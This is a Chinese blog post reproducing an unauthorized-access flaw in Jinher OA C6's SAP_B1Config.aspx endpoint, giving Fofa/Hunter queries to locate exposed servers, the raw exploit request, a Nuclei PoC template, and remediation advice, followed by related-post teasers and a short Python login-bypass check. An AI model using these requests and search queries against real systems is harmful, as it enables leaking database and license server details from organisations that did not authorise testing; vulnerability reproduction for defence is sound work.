【漏洞复现】金和OA 未授权访问

已于 2024-06-28 17:14:23 修改
阅读量604 收藏 4
点赞数 6
CC 4.0 BY-SA版权
文章标签: 漏洞挖掘 渗透 网络安全 漏洞复现
于 2024-06-28 17:09:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/140048693

【产品介绍】

金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。

【漏洞介绍】

金和OA sap-b1config-aspx接口存在未授权,攻击者可通过此漏洞获取敏感信息。

【资产测绘Query】

Fofa语法:app=”金和网络-金和OA”
Hunter语法:app.name=”金和 OA”

【产品界面】

【漏洞复现】

GET /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1 HTTP/1.1
Host:127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

【Nuclei-Poc】

id: jinher-oa-c6-jhsoft-sapb1config-unauth

info:
  name: jinher-oa-c6-jhsoft-sapb1config-unauth
  author: jinher-oa-c6-jhsoft-sapb1config-unauth
  severity: high

http:
  - raw:
      - |
        GET /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"txtLicenseServer","txtDatabaseServer")

【验证】

.\nuclei -l 1.txt -t 4.yaml

【修复建议】

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

2301_80127209
关注
金和OA GetSqlData.aspx 远程命令执行漏洞
xiaokp7的博客
09-13 915
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
漏洞复现金和OA C6 FileDownLoad.aspx 任意文件读取漏洞复现
m0_71944965的博客
12-31 192
金和OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
金和OA SAP_B1Config.aspx存在未授权访问漏洞
3tefanie的博客
01-03 774
【有些话可以不说透,自欺欺人,就可以糊涂一世,打打闹闹轻轻松松。】
漏洞复现-金和OA SAP_B1Config.aspx未授权访问漏洞
weixin_69010236的博客
01-10 582
金和QA办公系统是.款集合了办公自动化协同办公工作流管理等功能的企业级管理软件。金和OA办公系统提供了多个模块,包括日程管理、文件管理、邮件管理、人事管理、客户管理、项目管理等。用户可以根据自己的需求选择需要的模块进行使用。该系统存在未授权访问漏洞,攻击者可通过此漏洞获取数据库的账户密码等敏感信息。
漏洞复现金和OA C6 ApproveRemindSetExec.aspx XXE漏洞(CNVD-2024-40568)
m0_71944965的博客
12-05 393
金和 ApproveRemindSetExec.aspx 接口处存在XML实体注入漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患。
漏洞复现--金和OASQL注入
qq_53003652的博客
10-23 669
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品GetTreeDate.aspx存在SQL注入漏洞。sqlmap直接梭哈。
漏洞复现-金和OA系列
aming小老弟
03-14 1386
|| banner=“Path=/jc6”金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。app=“金和网络-金和OA”||body=“/jc6/platform/sys/login”请联系厂家 http://www.jinher.com/升级。
漏洞复现金和OA-C6-文件读取-FileDownLoad
知黑而守白
07-10 166
金和OA协同办公管理系统软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA FileDownLoad接口处存在任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。
金和OA-C6 ApproveRemindSetExec.aspx XXE漏洞复现(CNVD-2024-40568)
iSee857的博客
10-30 905
的六个核心要素:文化 Culture、 沟通Communication 、 协作Collaboration 、创新 Creation、 控制 Control、中心 Center,而构建了结构化的、灵活集成的、动态响应的、面向。Dtd内容是XXE无回显利用方式,将内容外带到其他地方,将内容通过get.php写入file.txt。官方已修复该漏洞,请用户联系厂商修复漏洞:http://www.jinher.com/构造dtd用以读取,dtd里内容构造vps读取。构造完成后vps启动服务用于信息监听。
金和OA任意文件读取漏洞
xiaokp7的博客
09-13 589
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用金和OA系统存在任意文件读取漏洞,攻击者通过恶意构造的请求下载服务器上的任意文件,包括敏感文件、配置文件、数据库文件等。
金和OA C6 gethomeinfo sql注入漏洞
Keepb1ue的博客
12-25 2338
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和 OA C6 gethomeinfo接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
金和OA GetAttOut接口存在SQL注入漏洞
nnn2188185的博客
01-12 264
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
金和OA GetTreeDate.aspx SQL注入漏洞
xiaokp7的博客
09-22 715
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
金和OA jc6 clobfield接口存在SQL注入漏洞
3tefanie的博客
12-19 901
【一个人活着时无论怎样苦口婆心劝说都听不进去的话,等到人不在了,那些话却像印上文件的朱记,抹都抹不去。】
金和OA jc6 ntko-upload 任意文件上传漏洞
3tefanie的博客
01-03 1123
【是人就有私心,就容易走错路。】
金和OA C6 UploadFileEditorSave.aspx 任意文件上传漏洞
Keepb1ue的博客
01-06 2194
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。金和 OA C6 uploadfileeditorsave接口处存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限。
金和OA_XmlDeal接口存在XXE漏洞
m0_46604997的博客
05-17 498
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务.二、漏洞描述金和OA C6系统XmlDeal接口存在XXE漏洞,应用程序在解析XML数据时,没有正确验证或限制实体引用,攻击者就可以通过构造恶意的XML输入,将外部实体引用进来,从而执行恶意操作。
漏洞复现-金和OA GetAttOut接口SQL注入漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-14 1053
漏洞复现-金和OA GetAttOut接口SQL注入漏洞,附带自己写的poc脚本
金和OA saveAsOtherFormatServlet接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
12-05 310
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该系统存在任意文件读漏洞
oa漏洞复现
最新发布
03-11
### 复现OA系统已知安全漏洞 对于复现OA系统的已知安全漏洞,了解具体的操作流程以及预防措施至关重要。以下是针对不同类型的OA系统及其常见漏洞复现方法。 #### 通达OA v在线用户登录漏洞 在尝试复现通达OA v在线用户登录漏洞时,应先理解其工作原理。通常情况下,这种类型的漏洞涉及身份验证机制中的缺陷,使得攻击者能够绕过正常的认证过程[^1]。为了重现这一现象,可以从分析HTTP请求入手,特别是关注POST请求的数据包结构,寻找是否存在可被篡改的关键参数。一旦确认了可疑字段,则可通过修改这些值来进行测试。 #### 泛微OA E-Office jx2_config.ini敏感信息泄漏漏洞 当涉及到泛微OA E-Office jx2_config.ini文件的信息泄露问题时,主要在于配置文件未受到适当保护而导致的内容外泄。要模拟这种情况的发生,可以构建一个类似的环境并故意设置不当权限给目标文件夹下的`jx2_config.ini`文件[^2]。接着发起GET请求试图获取该路径下资源,观察返回的结果是否包含了不应公开的信息片段。 #### 金和OA FileDownLoad接口任意文件读取漏洞 面对金和OA中FileDownLoad接口存在的任意文件读取情况,重点在于识别URL模式或者API调用方式中存在的安全隐患。通过构造特殊的查询字符串作为输入传递至服务器端处理逻辑之前的部分,可能会触发异常行为进而暴露出底层存储介质上的私密资料[^3]。实验过程中应当谨慎操作以免造成实际损害,并确保拥有合法授权后再执行任何可能影响生产环境的动作。 #### 万户OA-ezOFFICE DocumentEdit_unite.jsp SQL注入漏洞 SQL注入类别的弱点往往存在于动态拼接SQL语句的过程中未能充分过滤用户提交内容所致。就万户OA-ezOFFICE而言,在DocumentEdit_unite.jsp页面可能存在这样的风险点。为此,需准备一系列典型的恶意payloads用于探测数据库交互层面上是否有松散之处可供利用;同时注意调整浏览器开发者工具里的Network选项卡以便实时监控响应状态码变化及错误提示消息等反馈信息[^4]。 #### 九思OA dl.jsp任意文件读取漏洞 最后提到的是九思OA dl.jsp组件所携带的另一个形式相近却有所区别的任意外部实体加载隐患。这里同样依赖于对下载链接格式的研究来定位潜在入口点。发送带有特殊字符组合构成的目标地址后,如果能成功拉取到预期之外的对象则说明确实存在相应级别的危险性[^5]。 以上就是几种典型OA应用软件各自面临的主要挑战之一——即它们各自的代表性漏洞特征概述与初步探索思路分享。值得注意的是,在开展上述活动前务必取得相关方许可并且仅限于受控条件下实施! ```python import requests def test_login_bypass(url, payload): response = requests.post(url, data=payload) return 'success' in response.text.lower() url = "http://example.com/login" payload = {'username': 'admin', 'password': ''} if test_login_bypass(url, payload): print('Potential login bypass vulnerability detected.') else: print('No obvious vulnerabilities found during this attempt.') ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值